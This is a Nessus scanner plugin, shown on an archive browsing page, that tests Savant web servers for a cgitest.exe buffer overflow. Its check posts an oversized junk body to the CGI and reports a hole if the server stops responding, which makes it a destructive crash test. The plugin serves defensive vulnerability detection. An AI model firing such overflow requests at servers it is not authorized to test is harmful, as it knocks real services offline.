home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / savant_cgitest.nasl < prev    next >
Encoding:
Text File  |  2005-03-31  |  1.9 KB  |  86 lines
  1. #
  2. # This script was written by Michel Arboi <arboi@alussinan.org>
  3. #
  4. # GNU Public Licence
  5. #
  6. ########################
  7. # References:
  8. ########################
  10. # Date: Fri, 13 Sep 2002 19:55:05 +0000
  11. # From "Auriemma Luigi" <aluigi@pivx.com>
  12. # To: bugtraq@securityfocus.com
  13. # Subject: Savant 3.1 multiple vulnerabilities
  14. #
  15. ########################
  16.  
  17. if(description)
  18. {
  19.  script_id(11173);
  20.  script_bugtraq_id(5706);
  21.  script_version("$Revision: 1.10 $");
  22.  
  23.  name["english"] = "Savant cgitest.exe buffer overflow";
  24.  script_name(english:name["english"]);
  25.  
  26.  desc["english"] = "
  27. cgitest.exe from Savant web server is installed. This CGI is
  28. vulnerable to a buffer overflow which may allow a cracker to 
  29. crash your server or even run code on your system.
  30.  
  31. Risk factor : High
  32.  
  33. Solution : Upgrade your web server or remove this CGI.";
  34.  
  35.  script_description(english:desc["english"]);
  36.  
  37.  summary["english"] = "Savant cgitest.exe buffer overflow";
  38.  script_summary(english:summary["english"]);
  39.  
  40.  script_category(ACT_DESTRUCTIVE_ATTACK);
  41.  
  42.  
  43.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
  44.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  45.  family["english"] = "CGI abuses";
  46.  
  47.  script_family(english:family["english"]);
  48.  script_dependencie("find_service.nes", "http_version.nasl");
  49.  script_require_ports("Services/www",80);
  50.  exit(0);
  51. }
  52.  
  53.  
  54.  
  55. include("http_func.inc");
  56. include("http_keepalive.inc");
  57.  
  58. port = get_http_port(default:80);
  59.  
  60. if (! get_port_state(port)) exit(0);
  61.  
  62.  
  63. foreach dir (cgi_dirs())
  64. {
  65.  p = string(dir, "/cgitest.exe");
  66.  if(is_cgi_installed_ka(item:p, port:port))
  67.  {
  68.  soc = http_open_socket(port);
  69.  if (! soc) exit(0);
  70.  
  71.  len = 256;    # 136 should be enough
  72.  req = string("POST ", p, " HTTP/1.0\r\nContent-Length: ", len,
  73.     "\r\n\r\n", crap(len), "\r\n");
  74.  send(socket:soc, data:req);
  75.  http_close_socket(soc);
  76.  
  77.  sleep(1);
  78.  
  79.  if(http_is_dead(port: port))
  80.  {
  81.   security_hole(port);
  82.   exit(0);
  83.   } 
  84.  }
  85. }
  86.